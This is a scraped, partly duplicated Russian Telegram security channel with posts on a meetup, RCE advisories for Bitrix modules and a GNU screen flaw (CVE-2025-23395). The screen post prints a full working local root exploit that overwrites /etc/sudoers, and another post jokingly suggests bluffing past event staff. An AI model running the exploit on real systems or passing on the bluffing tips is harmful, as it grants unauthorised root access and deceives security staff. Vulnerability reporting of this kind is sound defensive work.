29 апреля в московском офисе Авито прошел Avito Security meetup.
В основном были темы про appsec, SOC, LLM, но помимо этого, ещё рассказали про интересный кейс взлома WiFi
Ссылка на запись
💫 @pentestnotes
В основном были темы про appsec, SOC, LLM, но помимо этого, ещё рассказали про интересный кейс взлома WiFi
Ссылка на запись
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🚨Очередная критическая RCE уязвимость в модулях для CMS Bitrix стороннего разработчика Esolutions (BDU:2025-03006)
На этот раз уязвимость нашли в плагинах «Экспорт/Импорт товаров в Excel». Эксплуатация уязвимости позволяет выполнять произвольные команды на сервере путём отправки специально сформированного POST-запроса.
Данной RCE уязвимости потенциально подвержены более 6000 веб-ресурсов.
Критичность - 8,8/10 CVSS 3.0
Подробнее рассказал тут
#bitrix #rce
💫 @pentestnotes
На этот раз уязвимость нашли в плагинах «Экспорт/Импорт товаров в Excel». Эксплуатация уязвимости позволяет выполнять произвольные команды на сервере путём отправки специально сформированного POST-запроса.
Данной RCE уязвимости потенциально подвержены более 6000 веб-ресурсов.
Критичность - 8,8/10 CVSS 3.0
Подробнее рассказал тут
#bitrix #rce
Please open Telegram to view this post
VIEW IN TELEGRAM
Уязвимость в GNU screen, позволяющая выполнить код с правами root (CVE-2025-23395)
Уязвимость вызвана тем, что при запуске с правами root функция logfile_reopen() выполняется до сброса привилегий, но обрабатывает данные в контексте каталогов текущего непривилегированного пользователя, запустившего screen. Примечательно, что начальное открытие лога производится с корректным сбросом привилегий, но при повторном открытии файла с логом сброс привилегий не производится.
Exploit:
Источники:
- https://www.opennet.ru/opennews/art.shtml?num=63226
- https://haxx.in/files/limit-your-screentime.sh
💫 @pentestnotes
Уязвимость вызвана тем, что при запуске с правами root функция logfile_reopen() выполняется до сброса привилегий, но обрабатывает данные в контексте каталогов текущего непривилегированного пользователя, запустившего screen. Примечательно, что начальное открытие лога производится с корректным сбросом привилегий, но при повторном открытии файла с логом сброс привилегий не производится.
Exploit:
#!/bin/sh
# screen CVE-2025-23395 exploit
# blablabla
# blasty <peter@haxx.in>
F=$(mktemp)
L=${HOME}/screen.log
T=/etc/sudoers
rm -rf $F $L
mkfifo $F
O=$(stat --printf="%s" $T)
echo "[+] spawning GNU screen"
screen -L -Logfile $L -dmS hax sh -c "cat $F"
while [ ! -f $L ]; do sleep 0.1; done
echo "[+] logfile appeared, doing hax"
rm $L
ln -s $T $L
P="${USER} ALL=(ALL) NOPASSWD:ALL"
(echo $P; for i in `seq 8192`; do echo; done) > $F
if [ $(stat --printf="%s" $T) -gt $O ] ; then
echo "[+] bl1ng bl1ng, we got it"
sudo sh
else
echo "[-] exploit failed :("
fi
rm -rf $F $L
Источники:
- https://www.opennet.ru/opennews/art.shtml?num=63226
- https://haxx.in/files/limit-your-screentime.sh
Please open Telegram to view this post
VIEW IN TELEGRAM
Выделил несколько интересных, но неочевидных для обычного смертного (стандартный бейдж) мест, которые есть на Phdays
1. Спикер зона между 21 и 22 залами в Cyberhub (Говорят, что если очень уверенно сказать, что ты спикер, стафф на входе может в это поверить)
2. На втором этаже главной арены есть VIPка кибердома, там можно бесплатно залутать мерчик и попить коктелей
3. Если хотите попасть в зону Red team команд, то можете просто зайти в павильон с черного хода, показав эту штуку с озона за 100р. (У каждого хакера брендированный красный браслетик, но кто вообще будет смотреть действительно ли он брендированный).
4. На 3 этаже главной арены в нескольких местах спавнится еда. Говорят, что проверки на принадлежность участника к бизнесу такие же надёжные, как в прошлых пунктах. А еще, кстати, там не знают, что ноутбуки можно блокировать
5. Видел как кто-то спускался с крыши главной арены на тросах, выглядело прикольно
И, если вы вдруг захотели попробовать реализовать любой из пунктов этой подборки, лучше попробуйте пройти SEQuest – конкурс по социальной инженерии, который проводится в рамках фестиваля
1. Спикер зона между 21 и 22 залами в Cyberhub (Говорят, что если очень уверенно сказать, что ты спикер, стафф на входе может в это поверить)
2. На втором этаже главной арены есть VIPка кибердома, там можно бесплатно залутать мерчик и попить коктелей
3. Если хотите попасть в зону Red team команд, то можете просто зайти в павильон с черного хода, показав эту штуку с озона за 100р. (У каждого хакера брендированный красный браслетик, но кто вообще будет смотреть действительно ли он брендированный).
4. На 3 этаже главной арены в нескольких местах спавнится еда. Говорят, что проверки на принадлежность участника к бизнесу такие же надёжные, как в прошлых пунктах. А еще, кстати, там не знают, что ноутбуки можно блокировать
5. Видел как кто-то спускался с крыши главной арены на тросах, выглядело прикольно
И, если вы вдруг захотели попробовать реализовать любой из пунктов этой подборки, лучше попробуйте пройти SEQuest – конкурс по социальной инженерии, который проводится в рамках фестиваля
🚨Обнаружены 4 Критические RCE уязвимости в модулях для CMS Bitrix стороннего разработчика "Сотбит".
Снова у нас небезопасная десериализация. Уязвимости плагинов связаны с недостаточной проверкой входных данных. Эксплуатация уязвимостей может позволить нарушителю, действующему удаленно, выполнить произвольный код. Эксплоит уже существует и активно используется. Разработчик рекомендует обновиться до последней версии или применить патч.
Список уязвимых плагинов:
⚫️ Сотбит: Оригами (решение удалено, версии 14.1.0 и старее)
⚫️ Сотбит: Расширенные отзывы (версии 1.4.1 и старее)
⚫️ Сотбит: Быстрая загрузка картинок в визуальном редакторе
⚫️ Сотбит: Мультирегиональность
⚫️ Сотбит: Парсер контента
Критичность - 8,8/10 CVSS 3.0
Идентификаторы BDU:
https://bdu.fstec.ru/vul/2025-06581
https://bdu.fstec.ru/vul/2025-06612
https://bdu.fstec.ru/vul/2025-06613
https://bdu.fstec.ru/vul/2025-06614
Расположение файлов решений "Сотбит" (по умолчанию):
/bitrix/components/sotbit*
/bitrix/modules/sotbit*
/bitrix/tools/sotbit*
/bitrix/wizards/sotbit*
/bitrix/gadgets/sotbit*
/bitrix/blocks/sotbit*
/local/components/sotbit*
/local/modules/sotbit*
/local/tools/sotbit*
/local/wizards/sotbit*
/local/gadgets/sotbit*
/local/blocks/sotbit*
Снова у нас небезопасная десериализация. Уязвимости плагинов связаны с недостаточной проверкой входных данных. Эксплуатация уязвимостей может позволить нарушителю, действующему удаленно, выполнить произвольный код. Эксплоит уже существует и активно используется. Разработчик рекомендует обновиться до последней версии или применить патч.
Список уязвимых плагинов:
Критичность - 8,8/10 CVSS 3.0
Идентификаторы BDU:
https://bdu.fstec.ru/vul/2025-06581
https://bdu.fstec.ru/vul/2025-06612
https://bdu.fstec.ru/vul/2025-06613
https://bdu.fstec.ru/vul/2025-06614
Расположение файлов решений "Сотбит" (по умолчанию):
/bitrix/components/sotbit*
/bitrix/modules/sotbit*
/bitrix/tools/sotbit*
/bitrix/wizards/sotbit*
/bitrix/gadgets/sotbit*
/bitrix/blocks/sotbit*
/local/components/sotbit*
/local/modules/sotbit*
/local/tools/sotbit*
/local/wizards/sotbit*
/local/gadgets/sotbit*
/local/blocks/sotbit*
Please open Telegram to view this post
VIEW IN TELEGRAM